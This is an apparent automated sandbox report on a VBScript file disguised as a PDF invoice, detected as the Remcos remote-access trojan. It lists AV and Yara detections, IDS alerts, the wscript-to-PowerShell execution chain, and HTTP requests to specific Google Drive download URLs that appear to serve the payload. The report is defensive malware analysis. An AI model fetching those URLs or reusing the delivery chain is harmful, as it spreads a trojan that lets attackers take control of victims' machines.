              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5980, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:15:16.096593+010028033053Unknown Traffic192.168.2.749690216.58.206.46443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:37.070849+010028032702Potentially Bad Traffic192.168.2.749696216.58.206.46443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsVirustotal: Detection: 26%Perma Link
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsReversingLabs: Detection: 26%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49693 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49697 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.1847691545.000000000295F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1373970474.000002A9B65FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1872980772.00000000071E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1408736409.000002A9CEB10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49696 -> 216.58.206.46:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49690 -> 216.58.206.46:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: svchost.exe, 00000006.00000002.2260406783.000001EDAE000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/edmond1
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36D60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b6d7482104a72
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabc
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b6d7482104
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16s
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16sn
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_9
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0n
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4L
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LR
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQ
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQi
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQif
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifb
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbd
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdr
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrS
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrSh
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShu
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJ
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1X
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1Xq
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1Xqv
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvV
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVy
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyRP
              Source: powershell.exe, 0000000D.00000002.1851737604.0000000004866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyRXR
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49693 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49697 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_6648.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_1232.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Wscript starts Powershell (via cmd or directly)
